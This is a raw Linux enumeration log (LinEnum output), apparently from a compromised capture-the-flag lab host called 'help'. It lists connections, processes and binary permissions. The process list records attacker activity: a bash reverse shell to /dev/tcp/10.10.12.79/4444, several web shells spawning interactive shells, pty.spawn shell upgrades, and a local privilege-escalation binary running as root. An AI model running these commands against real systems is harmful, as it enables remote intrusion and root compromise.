tcp6     149      0 10.10.10.121:3000       10.10.13.117:33107      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:48661      ESTABLISHED 76994/nodejs    
tcp6     146      0 10.10.10.121:3000       10.10.13.117:54753      ESTABLISHED 76994/nodejs    
tcp6     149      0 10.10.10.121:3000       10.10.13.117:41519      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:60479      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:40427       ESTABLISHED -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:41337      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:39271      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:49525       ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:49753       ESTABLISHED -               
tcp6       0      0 10.10.10.121:3000       10.10.13.117:59355      ESTABLISHED 76994/nodejs    
tcp6       1      0 10.10.10.121:80         10.10.12.219:56820      CLOSE_WAIT  -               
tcp6       0      0 10.10.10.121:80         10.10.14.170:49248      TIME_WAIT   -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:37075      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:41425       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.12.76:42944       TIME_WAIT   -               
tcp6     265      0 10.10.10.121:80         10.10.14.66:37053       ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:45593      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.66:34507       ESTABLISHED -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:35395      ESTABLISHED 76994/nodejs    
tcp6     150      0 10.10.10.121:3000       10.10.13.117:36535      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.66:50283       ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:60349      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:54071      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:53307       ESTABLISHED -               
tcp6       0    196 10.10.10.121:80         10.10.12.103:40112      ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:53521       ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:59893      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:45487      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:36371      ESTABLISHED 76994/nodejs    
tcp6     160      0 10.10.10.121:3000       10.10.13.117:55061      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.170:49242      TIME_WAIT   -               
tcp6     150      0 10.10.10.121:3000       10.10.13.117:40019      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.28:59924       TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:42311       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.14.66:51281       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.12.32:55750       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.12.208:59698      TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.12.55:46550       ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:53551      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:58509       ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:55849      ESTABLISHED 76994/nodejs    
tcp6     152      0 10.10.10.121:3000       10.10.13.117:57039      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.66:39311       ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:42483      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:33789       ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:55685       ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:51847      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.28:59918       TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:37515       ESTABLISHED -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:46259      ESTABLISHED 76994/nodejs    


[00;31m[-] Listening UDP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.0  0.3  37840  3552 ?        Ss   10:19   0:02 /sbin/init noprompt
root          2  0.0  0.0      0     0 ?        S    10:19   0:00 [kthreadd]
root          3  0.3  0.0      0     0 ?        S    10:19   0:09 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S<   10:19   0:00 [kworker/0:0H]
root          7  0.1  0.0      0     0 ?        S    10:19   0:02 [rcu_sched]
root          8  0.0  0.0      0     0 ?        S    10:19   0:00 [rcu_bh]
root          9  0.0  0.0      0     0 ?        S    10:19   0:00 [migration/0]
root         10  0.0  0.0      0     0 ?        S    10:19   0:00 [watchdog/0]
root         11  0.0  0.0      0     0 ?        S    10:19   0:00 [kdevtmpfs]
root         12  0.0  0.0      0     0 ?        S<   10:19   0:00 [netns]
root         13  0.0  0.0      0     0 ?        S<   10:19   0:00 [perf]
root         14  0.0  0.0      0     0 ?        S    10:19   0:00 [khungtaskd]
root         15  0.0  0.0      0     0 ?        S<   10:19   0:00 [writeback]
root         16  0.0  0.0      0     0 ?        SN   10:19   0:00 [ksmd]
root         17  0.0  0.0      0     0 ?        SN   10:19   0:00 [khugepaged]
root         18  0.0  0.0      0     0 ?        S<   10:19   0:00 [crypto]
root         19  0.0  0.0      0     0 ?        S<   10:19   0:00 [kintegrityd]
root         20  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         21  0.0  0.0      0     0 ?        S<   10:19   0:00 [kblockd]
root         22  0.0  0.0      0     0 ?        S<   10:19   0:00 [ata_sff]
root         23  0.0  0.0      0     0 ?        S<   10:19   0:00 [md]
root         24  0.0  0.0      0     0 ?        S<   10:19   0:00 [devfreq_wq]
root         28  0.0  0.0      0     0 ?        S    10:19   0:02 [kswapd0]
root         29  0.0  0.0      0     0 ?        S<   10:19   0:00 [vmstat]
root         30  0.0  0.0      0     0 ?        S    10:19   0:00 [fsnotify_mark]
root         31  0.0  0.0      0     0 ?        S    10:19   0:00 [ecryptfs-kthrea]
root         47  0.0  0.0      0     0 ?        S<   10:19   0:00 [kthrotld]
root         48  0.0  0.0      0     0 ?        S<   10:19   0:00 [acpi_thermal_pm]
root         49  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         50  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         51  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         52  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         53  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         54  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         55  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         56  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root         57  0.0  0.0      0     0 ?        S    10:19   0:00 [scsi_eh_0]
root         58  0.0  0.0      0     0 ?        S<   10:19   0:00 [scsi_tmf_0]
root         59  0.0  0.0      0     0 ?        S    10:19   0:00 [scsi_eh_1]
root         60  0.0  0.0      0     0 ?        S<   10:19   0:00 [scsi_tmf_1]
root         66  0.0  0.0      0     0 ?        S<   10:19   0:00 [ipv6_addrconf]
root         67  0.0  0.0      0     0 ?        S    10:19   0:00 [kworker/0:2]
root         80  0.0  0.0      0     0 ?        S<   10:19   0:00 [deferwq]
root         81  0.0  0.0      0     0 ?        S<   10:19   0:00 [charger_manager]
root         82  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root        140  0.0  0.0      0     0 ?        S    10:19   0:00 [scsi_eh_2]
root        141  0.0  0.0      0     0 ?        S<   10:19   0:00 [scsi_tmf_2]
root        142  0.0  0.0      0     0 ?        S<   10:19   0:00 [vmw_pvscsi_wq_2]
root        144  0.0  0.0      0     0 ?        S<   10:19   0:00 [bioset]
root        160  0.0  0.0      0     0 ?        S<   10:19   0:00 [kworker/0:1H]
root        161  0.0  0.0      0     0 ?        S<   10:19   0:00 [kpsmoused]
root        184  0.0  0.0      0     0 ?        S    10:20   0:00 [jbd2/sda1-8]
root        185  0.0  0.0      0     0 ?        S<   10:20   0:00 [ext4-rsv-conver]
root        235  0.1  0.2  28328  2960 ?        Ss   10:20   0:04 /lib/systemd/systemd-journald
root        239  0.0  0.0      0     0 ?        S    10:20   0:00 [kauditd]
root        274  0.0  0.2  42344  2264 ?        Ss   10:20   0:00 /lib/systemd/systemd-udevd
root        285  0.0  0.0 158624    76 ?        Ssl  10:20   0:00 vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid
root        301  0.1  0.4 116248  4588 ?        Ss   10:20   0:03 /usr/bin/vmtoolsd
systemd+    372  0.0  0.2 100324  2380 ?        Ssl  10:20   0:00 /lib/systemd/systemd-timesyncd
root        539  0.0  0.2 275888  2968 ?        Ssl  10:20   0:01 /usr/lib/accountsservice/accounts-daemon
message+    540  0.0  0.3  42896  3464 ?        Ss   10:20   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
syslog      552  0.0  0.2 256392  2288 ?        Ssl  10:20   0:01 /usr/sbin/rsyslogd -n
root        554  0.0  0.3  85432  3404 ?        Ss   10:20   0:00 /usr/bin/VGAuthService
root        568  0.0  0.1  28544  1760 ?        Ss   10:20   0:00 /lib/systemd/systemd-logind
root        574  0.0  0.2  29008  2340 ?        Ss   10:20   0:00 /usr/sbin/cron -f
root        608  0.0  0.1  15936  1384 tty1     Ss+  10:20   0:00 /sbin/agetty --noclear tty1 linux
help        686  0.0  1.1 947668 11740 ?        Ssl  10:20   0:00 /usr/bin/nodejs /usr/local/lib/node_modules/forever/bin/monitor /home/help/help/dist/bundle.js
mysql       759  0.1  9.8 1109176 98416 ?       Ssl  10:20   0:03 /usr/sbin/mysqld
root        767  0.0  0.5  65508  5244 ?        Ss   10:20   0:01 /usr/sbin/sshd -D
root        813  0.0  1.2 297540 12876 ?        Ss   10:20   0:01 /usr/sbin/apache2 -k start
Debian-+   1118  0.0  0.2  55872  2080 ?        Ss   10:20   0:00 /usr/sbin/exim4 -bd -q30m
help       1241  0.0  1.1 298268 11772 ?        S    10:20   0:01 /usr/sbin/apache2 -k start
help       1385  0.0  1.2 298148 12476 ?        S    10:21   0:00 /usr/sbin/apache2 -k start
help       1429  0.0  0.0   4504   668 ?        S    10:21   0:00 sh -c uname -a; w; id; /bin/sh -i
help       1433  0.0  0.0   4504   712 ?        S    10:21   0:00 /bin/sh -i
help       1460  0.0  0.2  32116  2460 ?        S    10:21   0:00 python -c import pty;pty.spawn('/bin/bash')
help       1461  0.0  0.2  19488  2436 pts/0    Ss   10:21   0:00 /bin/bash
root       1837  0.0  0.5  92828  5784 ?        Ss   10:24   0:00 sshd: help [priv]
help       1842  0.0  0.2  45276  2216 ?        Ss   10:24   0:00 /lib/systemd/systemd --user
help       1846  0.0  0.0  61292   140 ?        S    10:24   0:00 (sd-pam)
help       1864  0.0  0.3  92828  3352 ?        S    10:24   0:00 sshd: help@pts/1
help       1872  0.0  0.4  22620  4520 pts/1    Ss+  10:24   0:00 -bash
help       1998  0.0  0.0  11140    12 ?        Ss   10:25   0:00 /usr/bin/ssh-agent
root       2169  0.0  0.0      0     0 ?        S    10:26   0:00 [kworker/u256:1]
help       2192  0.0  0.0   4504   672 ?        S    10:26   0:00 sh -c vi 2>&1
help       2193  0.0  0.2  29128  2184 ?        S    10:26   0:00 vi
help       2266  0.0  0.0   4504   728 pts/0    S    10:27   0:00 /bin/sh
help       2437  0.0  0.0   4504   640 pts/0    S    10:28   0:00 /bin/sh
help       2554  0.0  0.0   4504   796 pts/0    S+   10:28   0:00 /bin/sh
help       2826  0.0  1.0 298024 10532 ?        S    10:30   0:01 /usr/sbin/apache2 -k start
help       3112  0.0  0.8 297960  8516 ?        S    10:32   0:01 /usr/sbin/apache2 -k start
help       3127  0.1  1.5 298264 15068 ?        S    10:32   0:02 /usr/sbin/apache2 -k start
help       3128  0.1  1.3 298332 13392 ?        S    10:32   0:02 /usr/sbin/apache2 -k start
help       3193  0.0  1.4 298256 14852 ?        S    10:32   0:01 /usr/sbin/apache2 -k start
root       3649  0.0  0.0      0     0 ?        S    10:34   0:01 [kworker/0:0]
help       3810  0.1  1.3 298316 13632 ?        S    10:35   0:02 /usr/sbin/apache2 -k start
help       3942  0.0  0.0   4504   696 ?        S    10:36   0:00 sh -c uname -a; w; id; /bin/sh -i
help       3946  0.0  0.1   4504  1636 ?        S    10:36   0:00 /bin/sh -i
help       4209  0.0  0.0   4504   704 ?        S    10:38   0:00 sh -c uname -a; w; id; /bin/sh -i
help       4213  0.0  0.1   4504  1528 ?        S    10:38   0:00 /bin/sh -i
help       4461  0.0  0.0   4504   744 ?        S    10:40   0:00 sh -c uname -a; w; id; /bin/sh -i
help       4465  0.0  0.1   4504  1524 ?        S    10:40   0:00 /bin/sh -i
help       4594  0.0  0.1   4504  1552 ?        S    10:41   0:00 /bin/sh -i
help       4717  0.0  0.5  32116  5004 ?        S    10:42   0:00 python /tmp/asdf.py
help       4718  0.0  0.4  19488  4560 pts/2    Ss   10:42   0:00 /bin/bash
help       4804  0.0  0.0   4504   704 ?        S    10:42   0:00 sh -c uname -a; w; id; /bin/sh -i
help       4808  0.0  0.0   4504   744 ?        S    10:42   0:00 /bin/sh -i
help       4958  0.0  0.5  32116  5040 ?        S    10:43   0:00 python -c import pty;pty.spawn("/bin/bash");
help       4959  0.0  0.4  19500  4644 pts/3    Ss+  10:43   0:00 /bin/bash
help       5651  0.0  1.2 298316 12836 ?        S    10:45   0:00 /usr/sbin/apache2 -k start
help       5654  0.0  1.4 298240 14076 ?        S    10:45   0:00 /usr/sbin/apache2 -k start
root       5846  0.0  0.2  49788  2924 pts/2    S+   10:46   0:00 sudo -l
help      11667  0.0  0.0   4504   784 ?        S    10:46   0:00 sh -c /bin/bash -c 'bash -i >& /dev/tcp/10.10.12.79/4444 0>&1'
help      11668  0.0  0.2  18024  2776 ?        S    10:46   0:00 /bin/bash -c bash -i >& /dev/tcp/10.10.12.79/4444 0>&1
help      11670  0.0  0.4  19488  4632 ?        S    10:46   0:00 bash -i
help      20195  0.0  0.5  32116  5060 ?        S    10:47   0:00 python -c import pty; pty.spawn("/bin/bash")
help      20204  0.0  0.4  19488  4536 pts/5    Ss+  10:47   0:00 /bin/bash
help      35378  0.1  1.5 298216 15628 ?        S    10:48   0:01 /usr/sbin/apache2 -k start
help      36177  0.0  1.4 298244 14916 ?        S    10:48   0:00 /usr/sbin/apache2 -k start
help      43120  0.0  1.4 298216 14132 ?        S    10:48   0:00 /usr/sbin/apache2 -k start
help      43133  0.1  1.4 298260 14524 ?        S    10:48   0:01 /usr/sbin/apache2 -k start
help      43140  0.1  1.5 298284 15344 ?        S    10:48   0:01 /usr/sbin/apache2 -k start
help      43147  0.1  1.4 298272 14740 ?        S    10:48   0:00 /usr/sbin/apache2 -k start
help      43350  0.1  1.4 298276 14364 ?        S    10:48   0:01 /usr/sbin/apache2 -k start
help      43363  0.1  1.4 298352 14220 ?        S    10:48   0:00 /usr/sbin/apache2 -k start
help      43367  0.1  1.4 298276 14168 ?        S    10:48   0:00 /usr/sbin/apache2 -k start
help      43597  0.1  1.4 298272 14456 ?        S    10:48   0:00 /usr/sbin/apache2 -k start
help      43602  0.1  1.4 298280 14696 ?        S    10:48   0:01 /usr/sbin/apache2 -k start
root      63753  0.0  0.0      0     0 ?        S    10:50   0:00 [kworker/u256:2]
help      76994 27.4  8.6 996376 86452 ?        Rl   10:52   2:10 /usr/bin/nodejs /home/help/help/dist/bundle.js
help      77125  0.0  0.0   4504   720 ?        S    10:52   0:00 sh -c uname -a; w; id; /bin/sh -i
help      77129  0.0  0.0   4504   780 ?        S    10:52   0:00 /bin/sh -i
help      77203  0.0  0.6  32116  6616 ?        S    10:53   0:00 python -c __import__('pty').spawn('/bin/bash')
help      77204  0.0  0.4  19500  4676 pts/6    Ss   10:53   0:00 /bin/bash
help      77344  0.0  0.0   4504   776 ?        S    10:54   0:00 sh -c uname -a; w; id; /bin/sh -i
help      77348  0.0  0.0   4504   796 ?        S    10:54   0:00 /bin/sh -i
help      77442  0.0  0.2  18024  2832 ?        S    10:54   0:00 bash
help      77529  0.0  0.0   4504   748 ?        S    10:55   0:00 sh -c python /tmp/asdf.py 2>&1
help      77530  0.0  0.6  32116  6616 ?        S    10:55   0:00 python /tmp/asdf.py
help      77531  0.0  0.4  19488  4540 pts/7    Ss+  10:55   0:00 /bin/bash
help      77577  0.3  1.2 298316 12688 ?        S    10:55   0:00 /usr/sbin/apache2 -k start
help      77608  0.1  1.3 298248 13332 ?        S    10:55   0:00 /usr/sbin/apache2 -k start
help      77724  0.0  0.1   4504  1732 ?        S    10:56   0:00 /bin/sh -i
help      78467  0.0  0.0   4504   748 ?        S    10:59   0:00 sh -c uname -a; w; id; /bin/sh -i
help      78481  0.0  0.0   4504   784 ?        S    10:59   0:00 /bin/sh -i
help      78574  0.1  0.4 297612  4584 ?        S    10:59   0:00 /usr/sbin/apache2 -k start
help      78627  0.0  0.3  19008  3920 ?        S    10:59   0:00 /bin/bash ./LinEnum.sh
help      78628  0.2  0.3  19328  3852 ?        S    10:59   0:00 /bin/bash ./LinEnum.sh
help      78629  0.0  0.0   4380   680 ?        S    10:59   0:00 tee -a
help      79004  0.0  0.3 297612  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79005  0.0  0.0   4424   676 ?        S    11:00   0:00 ./help
root      79006  0.0  0.0   4504   776 ?        S    11:00   0:00 sh -c /bin/bash
root      79007  0.0  0.2  18020  2652 ?        S    11:00   0:00 /bin/bash
help      79012  0.0  0.7 297952  7788 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79013  0.0  0.4 297612  4556 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79014  0.0  0.3 297604  3484 ?        R    11:00   0:00 /usr/sbin/apache2 -k start
help      79015  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79016  0.0  0.4 297612  4572 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79017  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79020  4.1  0.6 297824  6164 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79021  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79022  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79023  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79024  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79025  0.0  0.6 297824  6224 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79026  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79027  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79040  0.0  0.3  19016  3916 pts/6    S+   11:00   0:00 /bin/bash ./LinEnum.sh
help      79041  0.1  0.3  19248  3664 pts/6    S+   11:00   0:00 /bin/bash ./LinEnum.sh
help      79042  0.0  0.0   4380   676 pts/6    S+   11:00   0:00 tee -a
help      79046  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79047  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79048  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79049  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79050  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79051  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79052  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79053  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79054  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79055  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79056  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79057  0.0  0.4 297612  4572 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79058  0.8  1.1 298132 11968 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79059  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79060  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79061  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79062  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79063  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79064  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79065  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79066  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79067  0.0  0.4 297612  4564 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79068  0.0  0.3 297612  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79069  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79070  0.0  0.3 297612  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79071  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79072  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79074  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79075  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79076  0.5  1.3 298308 13100 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79077  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79078  0.0  0.8 138772  8316 ?        R    11:00   0:00 /usr/sbin/apache2 -k start
help      79079  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79080  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79082  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79083  0.0  0.9 298004  9752 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79084  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79086  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79087  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79088  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79089  0.0  0.4 297612  4568 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79090  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79091  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79093  0.0  0.3 297604  3484 ?        S    11:00   0:00 /usr/sbin/apache2 -k start
help      79206  0.0  0.3  19328  3536 ?        S    11:00   0:00 /bin/bash ./LinEnum.sh
help      79207 22.0  0.2  17164  2708 ?        R    11:00   0:00 find / -perm -2007 -type f -exec ls -la {} ;
root      79232  0.0  0.6  65508  6032 ?        Ss   11:00   0:00 sshd: [accepted]
sshd      79235  0.0  0.0  65508   728 ?        S    11:00   0:00 sshd: [net]
help      79307  0.0  0.3  19248  3100 pts/6    S+   11:00   0:00 /bin/bash ./LinEnum.sh
help      79308  0.0  0.2  34424  2800 pts/6    R+   11:00   0:00 ps aux


[00;31m[-] Process binaries and associated permissions (from above list):[00m
  16K -rwxrwxrwx 1 help help   14K Feb  7 10:59 ./help
1016K -rwxr-xr-x 1 root root 1014K May 16  2017 /bin/bash
    0 lrwxrwxrwx 1 root root     4 Nov 27 00:39 /bin/sh -> dash
 1.6M -rwxr-xr-x 1 root root  1.6M Jul 30  2018 /lib/systemd/systemd
 320K -rwxr-xr-x 1 root root  319K Jul 30  2018 /lib/systemd/systemd-journald
 608K -rwxr-xr-x 1 root root  605K Jul 30  2018 /lib/systemd/systemd-logind
 140K -rwxr-xr-x 1 root root  139K Jul 30  2018 /lib/systemd/systemd-timesyncd
 444K -rwxr-xr-x 1 root root  443K Jul 30  2018 /lib/systemd/systemd-udevd
  44K -rwxr-xr-x 1 root root   44K May 16  2018 /sbin/agetty
    0 lrwxrwxrwx 1 root root    20 Nov 27 00:39 /sbin/init -> /lib/systemd/systemd
 124K -rwxr-xr-x 1 root root  121K May  8  2018 /usr/bin/VGAuthService
 220K -rwxr-xr-x 1 root root  219K Jan 12  2017 /usr/bin/dbus-daemon
  11M -rwxr-xr-x 1 root root   11M Aug  9 13:30 /usr/bin/nodejs
 352K -rwxr-sr-x 1 root ssh   351K Nov  5 03:26 /usr/bin/ssh-agent
  48K -rwxr-xr-x 1 root root   48K May  8  2018 /usr/bin/vmtoolsd
 164K -rwxr-xr-x 1 root root  162K Nov  3  2016 /usr/lib/accountsservice/accounts-daemon
 648K -rwxr-xr-x 1 root root  648K Jun 13  2018 /usr/sbin/apache2
  44K -rwxr-xr-x 1 root root   44K Apr  5  2016 /usr/sbin/cron
1016K -rwsr-xr-x 1 root root 1015K Feb 10  2018 /usr/sbin/exim4
  24M -rwxr-xr-x 1 root root   24M Oct 23 05:11 /usr/sbin/mysqld
 588K -rwxr-xr-x 1 root root  586K Apr  5  2016 /usr/sbin/rsyslogd
 776K -rwxr-xr-x 1 root root  773K Nov  5 03:26 /usr/sbin/sshd


[00;31m[-] /etc/init.d/ binary permissions:[00m
total 276
drwxr-xr-x  2 root root 4096 Nov 28 09:52 .
drwxr-xr-x 93 root root 4096 Jan 13 13:19 ..
-rw-r--r--  1 root root 1401 Nov 28 09:52 .depend.boot
-rw-r--r--  1 root root  584 Nov 28 09:52 .depend.start
-rw-r--r--  1 root root  758 Nov 28 09:52 .depend.stop
-rw-r--r--  1 root root 2427 Jan 19  2016 README
-rwxr-xr-x  1 root root 2210 Jun 11  2018 apache-htcacheclean
-rwxr-xr-x  1 root root 8087 Jun 11  2018 apache2
-rwxr-xr-x  1 root root 6223 Mar  3  2017 apparmor
-rwxr-xr-x  1 root root 1275 Jan 19  2016 bootmisc.sh
-rwxr-xr-x  1 root root 3807 Jan 19  2016 checkfs.sh
-rwxr-xr-x  1 root root 1098 Jan 19  2016 checkroot-bootclean.sh
-rwxr-xr-x  1 root root 9353 Jan 19  2016 checkroot.sh
-rwxr-xr-x  1 root root 1343 Apr  4  2016 console-setup
-rwxr-xr-x  1 root root 3049 Apr  5  2016 cron
-rwxr-xr-x  1 root root 2813 Dec  1  2015 dbus
-rwxr-xr-x  1 root root 6685 Mar  2  2016 exim4
-rwxr-xr-x  1 root root 1105 Jan 24  2018 grub-common
-rwxr-xr-x  1 root root 1336 Jan 19  2016 halt
-rwxr-xr-x  1 root root 1423 Jan 19  2016 hostname.sh
-rwxr-xr-x  1 root root 3809 Mar 12  2016 hwclock.sh
-rwxr-xr-x  1 root root 2372 Apr 11  2016 irqbalance
-rwxr-xr-x  1 root root 1804 Apr  4  2016 keyboard-setup
-rwxr-xr-x  1 root root 1300 Jan 19  2016 killprocs
-rwxr-xr-x  1 root root 2087 Dec 20  2015 kmod
-rwxr-xr-x  1 root root  703 Jan 19  2016 mountall-bootclean.sh
-rwxr-xr-x  1 root root 2301 Jan 19  2016 mountall.sh
-rwxr-xr-x  1 root root 1461 Jan 19  2016 mountdevsubfs.sh
-rwxr-xr-x  1 root root 1564 Jan 19  2016 mountkernfs.sh
-rwxr-xr-x  1 root root  711 Jan 19  2016 mountnfs-bootclean.sh
-rwxr-xr-x  1 root root 2456 Jan 19  2016 mountnfs.sh
-rwxr-xr-x  1 root root 5607 Feb  3  2017 mysql
-rwxr-xr-x  1 root root 4771 Jul 19  2015 networking
-rwxr-xr-x  1 root root 1581 Oct 15  2015 ondemand
-rwxr-xr-x  1 root root 1846 Mar 22  2018 open-vm-tools
-rwxr-xr-x  1 root root 1366 Nov 15  2015 plymouth
-rwxr-xr-x  1 root root  752 Nov 15  2015 plymouth-log
-rwxr-xr-x  1 root root 1192 Sep  5  2015 procps
-rwxr-xr-x  1 root root 6366 Jan 19  2016 rc
-rwxr-xr-x  1 root root  820 Jan 19  2016 rc.local
-rwxr-xr-x  1 root root  117 Jan 19  2016 rcS
-rwxr-xr-x  1 root root  661 Jan 19  2016 reboot
-rwxr-xr-x  1 root root 4149 Nov 23  2015 resolvconf
-rwxr-xr-x  1 root root 4355 Jul 10  2014 rsync
